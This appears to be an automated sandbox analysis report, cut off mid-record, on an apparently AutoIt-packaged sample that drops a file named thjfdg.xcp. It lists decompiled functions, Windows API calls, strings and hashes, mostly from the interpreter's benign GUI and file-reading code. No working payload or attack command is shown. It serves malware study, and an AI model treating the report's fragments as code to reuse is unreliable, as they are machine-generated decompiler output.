                • Instruction ID: 1025aa16d1a2dc63b225bd7aad9e021c4b64ebb8176314db28861e78240d500e
                • Opcode Fuzzy Hash: 4e9b87dee43c06cbb3df9c1248ac0cbd69f9d630d7977fef8bee4bbdabd24e7c
                • Instruction Fuzzy Hash: 72312472988205F7E6545BE0BE0DF597718FB64727F004432F30DA54D0CBF551A19A6E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0042085C, Relevance: 42.2, APIs: 28, Instructions: 200windowCOMMON
                Download Yara Rule
                C-Code - Quality: 92%
                			E0042085C(struct HBRUSH__* _a4, struct HWND__** _a8) {
				long _v8;
				long _v12;
				signed int _v16;
				int _v20;
				signed int _v24;
				WCHAR* _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				long _v44;
				struct tagRECT _v60;
				void* __edi;
				void* __esi;
				signed int _t72;
				signed int _t73;
				long _t74;
				long _t75;
				long _t76;
				long _t78;
				long _t79;
				void* _t80;
				signed int _t93;
				WCHAR* _t95;
				struct HWND__** _t117;
				struct HBRUSH__* _t149;
				WCHAR* _t150;
				struct HDC__* _t152;
				signed int _t159;

				_t149 = _a4;
				_t72 =  *(_t149 + 0x10);
				_t152 =  *(_t149 + 0x18);
				_t73 = _t72 & 0x00000006;
				_v24 = _t72 & 0x00000010;
				_v16 = _t73;
				if(_t73 == 0) {
					_t117 = _a8;
					_t74 =  *(_t117 + 0x48);
					__eflags = _t74 - 0xffffffff;
					if(__eflags == 0) {
						_t74 = GetSysColor(0x12);
					}
					_t75 = SetTextColor(_t152, _t74);
				} else {
					_t75 = SetTextColor(_t152, GetSysColor(0xe));
					_t117 = _a8;
				}
				_v8 = _t75;
				_t76 =  *(_t117 + 0x44);
				if(_t76 != 0xffffffff) {
					_a4 = CreateSolidBrush(_t76);
					_t78 =  *(_t117 + 0x44);
				} else {
					_a4 = GetSysColorBrush(0xf);
					_t78 = GetSysColor(0xf);
				}
				_v12 = _t78;
				if(_v16 == 0) {
					_t79 = 0x743c00;
				} else {
					_t79 = GetSysColor(0x11);
				}
				_t80 = CreatePen(0, 1, _t79);
				_v40 = _t80;
				_v36 = SelectObject(_t152, _t80);
				_v44 = SetBkColor(_t152, _v12);
				_v32 = SelectObject(_t152, _a4);
				_v60.top =  *(_t149 + 0x20);
				_v60.left =  *(_t149 + 0x1c);
				_v60.right =  *(_t149 + 0x24);
				_v60.bottom =  *(_t149 + 0x28);
				InflateRect( &_v60, 0xffffffff, 0xffffffff);
				RoundRect(_t152, _v60.left, _v60.top, _v60.right, _v60.bottom, 5, 5);
				_v12 = 0x105;
				_t159 = GetWindowLongW( *_a8, 0xfffffff0) & 0x00002000;
				if(_t159 == 0) {
					_v12 = 0x125;
				}
				_t93 = SendMessageW( *_a8, 0xe, 0, 0) + 1;
				_v20 = _t93;
				_push( ~(0 | _t159 > 0x00000000) | _t93 * 0x00000002);
				_t95 = E004014F7(_t149, _t152, _t159);
				_v28 = _t95;
				GetWindowTextW( *_a8, _t95, _v20);
				if(_v24 != 0) {
					_v60.top =  *(_t149 + 0x20);
					_v60 =  *(_t149 + 0x1c);
					_v60.right =  *(_t149 + 0x24);
					_v60.bottom =  *(_t149 + 0x28);
					InflateRect( &_v60, 0xfffffffd, 0xfffffffd);
					DrawFocusRect(_t152,  &_v60);
				}
				if(_v16 != 0) {
					SetTextColor(_t152, GetSysColor(0x11));
				}
				_t150 = _v28;
				DrawTextW(_t152, _t150, 0xffffffff,  &_v60, _v12);
				_push(_t150);
				E004010FC();
				SelectObject(_t152, _v32);
				DeleteObject(_a4);
				SelectObject(_t152, _v36);
				DeleteObject(_v40);
				SetTextColor(_t152, _v8);
				SetBkColor(_t152, _v44);
				return 1;
			}































                0x00420865
                0x00420868
                0x0042086b
                0x00420873
                0x00420876
                0x00420879
                0x0042087c
                0x00420893
                0x00420896
                0x00420899
                0x0042089c
                0x004208a0
                0x004208a0
                0x004208a8
                0x0042087e
                0x00420888
                0x0042088e
                0x0042088e
                0x004208ae
                0x004208b1
                0x004208b7
                0x004208d5
                0x004208d8
                0x004208b9
                0x004208c3
                0x004208c6
                0x004208c6
                0x004208df
                0x004208e2
                0x004208ee
                0x004208e4
                0x004208e6
                0x004208e6
                0x004208f8
                0x00420906
                0x00420910
                0x0042091e
                0x00420929
                0x00420931
                0x00420934
                0x00420940
                0x00420943
                0x00420946
                0x00420961
                0x0042096f
                0x0042097c
                0x00420981
                0x00420983
                0x00420983
                0x0042099c
                0x0042099f
                0x004209b0
                0x004209b1
                0x004209c1
                0x004209c7
                0x004209d1
                0x004209de
                0x004209e1
                0x004209ed
                0x004209f0
                0x004209f3
                0x004209fe
                0x004209fe
                0x00420a08
                0x00420a14
                0x00420a14
                0x00420a1d
                0x00420a29
                0x00420a2f
                0x00420a30
                0x00420a3d
                0x00420a49
                0x00420a50
                0x00420a56
                0x00420a5d
                0x00420a68
                0x00420a79

                APIs
                • GetSysColor.USER32(0000000E), ref: 00420880
                • SetTextColor.GDI32(?,00000000), ref: 00420888
                • GetSysColor.USER32(00000012), ref: 004208A0
                • SetTextColor.GDI32(?,?), ref: 004208A8
                • GetSysColorBrush.USER32(0000000F), ref: 004208BB
                • GetSysColor.USER32(0000000F), ref: 004208C6
                • CreateSolidBrush.GDI32(?), ref: 004208CF
                • GetSysColor.USER32(00000011), ref: 004208E6
                • CreatePen.GDI32(00000000,00000001,00743C00), ref: 004208F8
                • SelectObject.GDI32(?,00000000), ref: 00420909
                • SetBkColor.GDI32(?,?), ref: 00420913
                • SelectObject.GDI32(?,?), ref: 00420921
                • InflateRect.USER32(?,000000FF,000000FF), ref: 00420946
                • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00420961
                • GetWindowLongW.USER32(?,000000F0), ref: 00420976
                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00420996
                • GetWindowTextW.USER32 ref: 004209C7
                • InflateRect.USER32(?,000000FD,000000FD), ref: 004209F3
                • DrawFocusRect.USER32 ref: 004209FE
                • GetSysColor.USER32(00000011), ref: 00420A0C
                • SetTextColor.GDI32(?,00000000), ref: 00420A14
                • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00420A29
                • SelectObject.GDI32(?,?), ref: 00420A3D
                • DeleteObject.GDI32(00000105), ref: 00420A49
                • SelectObject.GDI32(?,?), ref: 00420A50
                • DeleteObject.GDI32(?), ref: 00420A56
                • SetTextColor.GDI32(?,?), ref: 00420A5D
                • SetBkColor.GDI32(?,?), ref: 00420A68
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                • String ID:
                • API String ID: 1582027408-0
                • Opcode ID: a9ebf5cc04f77b742cbc964064a11f73e3aa68c8c348c574d456546e66e5582e
                • Instruction ID: ca75df2b364e8831ddb4bbdc78bbd2b4c157d0ef3ab89114df15853b689c112f
                • Opcode Fuzzy Hash: a9ebf5cc04f77b742cbc964064a11f73e3aa68c8c348c574d456546e66e5582e
                • Instruction Fuzzy Hash: 38712271900215AFDB04DFA4DD88EAEBBB9FF48310F104229F519A7291D774A981CFA8
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00446529, Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 291windowCOMMON
                Download Yara Rule
                APIs
                • GetCursorPos.USER32(?,?), ref: 00446625
                • GetDesktopWindow.USER32 ref: 0044663A
                • GetWindowRect.USER32 ref: 00446641
                • GetWindowLongW.USER32(?,000000F0), ref: 00446699
                • GetWindowLongW.USER32(?,000000F0), ref: 004466AC
                • DestroyWindow.USER32(?), ref: 004466BD
                • CreateWindowExW.USER32 ref: 0044670B
                • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 00446729
                • SendMessageW.USER32(?,00000418,00000000,?), ref: 0044673D
                • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 0044674D
                • SendMessageW.USER32(?,00000421,?,?), ref: 0044676D
                • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00446783
                • IsWindowVisible.USER32 ref: 004467A3
                • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 004467BF
                • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 004467D3
                • GetWindowRect.USER32 ref: 004467EA
                • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00446808
                • GetMonitorInfoW.USER32 ref: 00446820
                • CopyRect.USER32 ref: 00446835
                • SendMessageW.USER32(?,00000412,00000000), ref: 0044688B
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                • String ID: ($,$tooltips_class32
                • API String ID: 225202481-3320066284
                • Opcode ID: 78b12f885743bd2bfdfb01396a78f55834592f114ae1a0983fe640aa07eec1a1
                • Instruction ID: f199cdef19119e69ce6eee1c779607871887572d5a1a2bd9c1bf60db431eab9b
                • Opcode Fuzzy Hash: 78b12f885743bd2bfdfb01396a78f55834592f114ae1a0983fe640aa07eec1a1
                • Instruction Fuzzy Hash: 22B18070A00309AFEB14DFA4CD85FAEB7B5FF49300F10855AE519AB281DB78AD45CB58
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004239F8, Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 196COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                • API String ID: 1503153545-1459072770
                • Opcode ID: 2c78a2cd4f7e0adff4185e135b2bfbebefd980ec325bd5401e82ede3bc7bc3de
                • Instruction ID: e99d83294ece70ac57446c375a5ff3ce392f42ebc62744769e6d5baf9e112664
                • Opcode Fuzzy Hash: 2c78a2cd4f7e0adff4185e135b2bfbebefd980ec325bd5401e82ede3bc7bc3de
                • Instruction Fuzzy Hash: 64512872A0021877E710BA659C43EBF776CDF45715F40812FFC09B6293EA7DAA0192AD
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00458322, Relevance: 33.4, APIs: 6, Strings: 13, Instructions: 116COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: __wcsicoll$__wcsnicmp
                • String ID: ,QG$ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                • API String ID: 790654849-347499930
                • Opcode ID: 24dafac37a65c283bb25874013317229198de2321c32351909c018cd9b6a7e09
                • Instruction ID: dc1880d83ec0c255b1f54e1501b8f5fef53c9caf4f8d72ecdd2a050ffd37b9d3
                • Opcode Fuzzy Hash: 24dafac37a65c283bb25874013317229198de2321c32351909c018cd9b6a7e09
                • Instruction Fuzzy Hash: EF316871E04209A6DB10E661DD43BEE736C9F11706F504127FE45BF1D2EF6CAE0886AA
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00445A00, Relevance: 31.9, APIs: 21, Instructions: 395COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 99cb99217b17c5d9a4a5fa1815c85413cc79500ae075e94f1b4d5d3dedda790f
                • Instruction ID: e31bc72afab22e698491e8647d3acc9d34ded054d0aba45e41c70eb465dba7fb
                • Opcode Fuzzy Hash: 99cb99217b17c5d9a4a5fa1815c85413cc79500ae075e94f1b4d5d3dedda790f
                • Instruction Fuzzy Hash: D5C159727002046BF720CFA8DC46FABB7A4EF55311F10417BFA05EA2C0D7B999058795
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00442A3C, Relevance: 31.8, APIs: 21, Instructions: 343COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00432B7B: __time64.LIBCMT ref: 00432B87
                • _fseek.LIBCMT ref: 00442AB0
                • __wsplitpath.LIBCMT ref: 00442B10
                • _wcscpy.LIBCMT ref: 00442B25
                • _wcscat.LIBCMT ref: 00442B3A
                • __wsplitpath.LIBCMT ref: 00442B64
                • _wcscat.LIBCMT ref: 00442B7C
                • _wcscat.LIBCMT ref: 00442B91
                • __fread_nolock.LIBCMT ref: 00442BC8
                • __fread_nolock.LIBCMT ref: 00442BD9
                • __fread_nolock.LIBCMT ref: 00442BF8
                • __fread_nolock.LIBCMT ref: 00442C09
                • __fread_nolock.LIBCMT ref: 00442C2A
                • __fread_nolock.LIBCMT ref: 00442C3B
                • __fread_nolock.LIBCMT ref: 00442C4C
                • __fread_nolock.LIBCMT ref: 00442C5D
                  • Part of subcall function 0044268F: __fread_nolock.LIBCMT ref: 004426B4
                  • Part of subcall function 0044268F: __fread_nolock.LIBCMT ref: 004426F6
                  • Part of subcall function 0044268F: __fread_nolock.LIBCMT ref: 00442714
                  • Part of subcall function 0044268F: _wcscpy.LIBCMT ref: 00442748
                  • Part of subcall function 0044268F: __fread_nolock.LIBCMT ref: 00442758
                  • Part of subcall function 0044268F: __fread_nolock.LIBCMT ref: 00442776
                  • Part of subcall function 0044268F: _wcscpy.LIBCMT ref: 004427A7
                • __fread_nolock.LIBCMT ref: 00442CED
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                • String ID:
                • API String ID: 2054058615-0
                • Opcode ID: 0aa3da7223e3953df6c0df051da1ff761bcb21dd2dfb0578287ee68ecce8adaf
                • Instruction ID: 91ebd86197f8007c9d10c448d5a9676df7a4475d6ea05a7df747ee3f7eeea791
                • Opcode Fuzzy Hash: 0aa3da7223e3953df6c0df051da1ff761bcb21dd2dfb0578287ee68ecce8adaf
                • Instruction Fuzzy Hash: 1EC160B2508340ABD324DF65D981EEBB7E9FFC8704F404D2EF68987240E6B99544CB66
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00438665, Relevance: 31.8, APIs: 17, Strings: 1, Instructions: 311COMMON
                Download Yara Rule
                APIs
                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00438716
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Window
                • String ID: 0
                • API String ID: 2353593579-4108050209
                • Opcode ID: bb3ef2a5c41d7e1f13a27ca82bab2f26fad87abfb218b970b40375b80fc8ba8d
                • Instruction ID: 0ea1c98733b78a00e85c542a32363e9fef487869e671399b9f36ba6dcea138b8
                • Opcode Fuzzy Hash: bb3ef2a5c41d7e1f13a27ca82bab2f26fad87abfb218b970b40375b80fc8ba8d
                • Instruction Fuzzy Hash: F9B1D2B02043419BE324DF24CC85BABFBE4BB89304F14592EF595972D1CBB8E945CB59
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0045ED23, Relevance: 28.5, APIs: 6, Strings: 10, Instructions: 471COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 003F2390: _wcslen.LIBCMT ref: 003F239D
                  • Part of subcall function 003F2390: _memmove.LIBCMT ref: 003F23C3
                • GetForegroundWindow.USER32(?,?,?,?,?,?,?), ref: 0045EE0E
                • GetForegroundWindow.USER32(?,?,?,?,?,?), ref: 0045F1FA
                • IsWindow.USER32(?), ref: 0045F22F
                • GetDesktopWindow.USER32 ref: 0045F2EB
                • EnumChildWindows.USER32 ref: 0045F2F2
                • EnumWindows.USER32(00451059,?), ref: 0045F2FA
                  • Part of subcall function 004359E6: _wcslen.LIBCMT ref: 004359F6
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Window$EnumForegroundWindows_wcslen$ChildDesktop_memmove
                • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE$dNG
                • API String ID: 329138477-3928073304
                • Opcode ID: 0a7458455e10acde7bf768dd1f6be66c94a9fe278e1130bd5e6e34bf0f500791
                • Instruction ID: 0c80b61a05ff62b8555de9dc97e8e7afa2378736351e64d3d7c15c9f8f33d3ff
                • Opcode Fuzzy Hash: 0a7458455e10acde7bf768dd1f6be66c94a9fe278e1130bd5e6e34bf0f500791
                • Instruction Fuzzy Hash: B8F1E6715243449BCB00EF61D882AABB3A4BF94305F04856EFD455B283DB79E90DCBA7
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003F2190, Relevance: 26.5, APIs: 7, Strings: 8, Instructions: 202COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 003F1D10: _wcslen.LIBCMT ref: 003F1D11
                  • Part of subcall function 003F1D10: _memmove.LIBCMT ref: 003F1D57
                • __wcsicoll.LIBCMT ref: 003F2262
                • __wcsicoll.LIBCMT ref: 003F2278
                • __wcsicoll.LIBCMT ref: 003F228E
                  • Part of subcall function 004013CB: __wcsicmp_l.LIBCMT ref: 0040144B
                • __wcsicoll.LIBCMT ref: 003F22A4
                • _wcscpy.LIBCMT ref: 003F22C4
                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\31956653\thjfdg.xcp,00000104), ref: 00418AD6
                • _wcscpy.LIBCMT ref: 00418B29
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: __wcsicoll$_wcscpy$FileModuleName__wcsicmp_l_memmove_wcslen
                • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\31956653\thjfdg.xcp$CMDLINE$CMDLINERAW$hNG
                • API String ID: 574121520-772976596
                • Opcode ID: b4b7e4b4a9085c02a88d7c71b1b59cbcd410ca872779be885c82ae66ddc17c39
                • Instruction ID: 99521299d097c3ea4ddb10065a40baeff210d6271a63c9ee4edbb1701ccc27eb
                • Opcode Fuzzy Hash: b4b7e4b4a9085c02a88d7c71b1b59cbcd410ca872779be885c82ae66ddc17c39
                • Instruction Fuzzy Hash: 01717071D1420EDBCF01EBA0DC92AFE7B74AF50344F00442AEA057B295EBB56949CBE5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00442833, Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 172COMMON
                Download Yara Rule
                APIs
                • _fseek.LIBCMT ref: 004428A1
                  • Part of subcall function 0044268F: __fread_nolock.LIBCMT ref: 004426B4
                  • Part of subcall function 0044268F: __fread_nolock.LIBCMT ref: 004426F6
                  • Part of subcall function 0044268F: __fread_nolock.LIBCMT ref: 00442714
                  • Part of subcall function 0044268F: _wcscpy.LIBCMT ref: 00442748
                  • Part of subcall function 0044268F: __fread_nolock.LIBCMT ref: 00442758
                  • Part of subcall function 0044268F: __fread_nolock.LIBCMT ref: 00442776
                  • Part of subcall function 0044268F: _wcscpy.LIBCMT ref: 004427A7
                • __fread_nolock.LIBCMT ref: 004428D8
                • __fread_nolock.LIBCMT ref: 004428E8
                • __fread_nolock.LIBCMT ref: 00442901
                • __fread_nolock.LIBCMT ref: 0044291B
                • _fseek.LIBCMT ref: 00442935
                • _malloc.LIBCMT ref: 00442940
                • _malloc.LIBCMT ref: 0044294C
                • __fread_nolock.LIBCMT ref: 0044295D
                • _free.LIBCMT ref: 0044298C
                • _free.LIBCMT ref: 00442995
                Strings
                • C:\Users\user\31956653\thjfdg.xcp, xrefs: 00442842
                • >>>AUTOIT SCRIPT<<<, xrefs: 004428B0
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                • String ID: >>>AUTOIT SCRIPT<<<$C:\Users\user\31956653\thjfdg.xcp
                • API String ID: 1255752989-362982297
                • Opcode ID: 4b185a0d3ba19172f171b6a8ba8b9d250b19bdf87faf0a21dbf7604220102f97
                • Instruction ID: f2499638239bcffcbaac5966cc4fd15be0deede3cd2b8eccdb6efdd6c7fe348c
                • Opcode Fuzzy Hash: 4b185a0d3ba19172f171b6a8ba8b9d250b19bdf87faf0a21dbf7604220102f97
                • Instruction Fuzzy Hash: 325102F1900214AFDB20DF69DC81B9AB7B8EF88304F0045AEF64CE7241E7759A94CB59
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004241CD, Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 91windowCOMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: __wcsicoll$IconLoad
                • String ID: blank$info$question$stop$warning
                • API String ID: 2485277191-404129466
                • Opcode ID: 5a26dd7bb0a12033ce1ff021f7a9e5f33556f64d0263ba313632164664f2981d
                • Instruction ID: 26c31165e07ff319bf43211074fcb9052c4dd673e1d4287c8b4441a1c6fd3065
                • Opcode Fuzzy Hash: 5a26dd7bb0a12033ce1ff021f7a9e5f33556f64d0263ba313632164664f2981d
                • Instruction Fuzzy Hash: 92219B72744215A6DB106B66BC06FDB735CDF94352F444037FD08E2286E3B9A92492FD
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004445AE, Relevance: 25.7, APIs: 17, Instructions: 199windowtimeCOMMON
                Download Yara Rule
                APIs
                • LoadIconW.USER32 ref: 004445C1
                • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 004445D3
                • SetWindowTextW.USER32(?,?), ref: 004445ED
                • GetDlgItem.USER32 ref: 00444605
                • SetWindowTextW.USER32(00000000,?), ref: 0044460C
                • GetDlgItem.USER32 ref: 0044461D
                • SetWindowTextW.USER32(00000000,?), ref: 00444624
                • SendDlgItemMessageW.USER32 ref: 00444646
                • SendDlgItemMessageW.USER32 ref: 00444660
                • GetWindowRect.USER32 ref: 0044466A
                • SetWindowTextW.USER32(?,?), ref: 004446DA
                • GetDesktopWindow.USER32 ref: 004446E4
                • GetWindowRect.USER32 ref: 004446EB
                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00444739
                • GetClientRect.USER32 ref: 00444747
                • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 00444771
                • SetTimer.USER32 ref: 004447B4
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
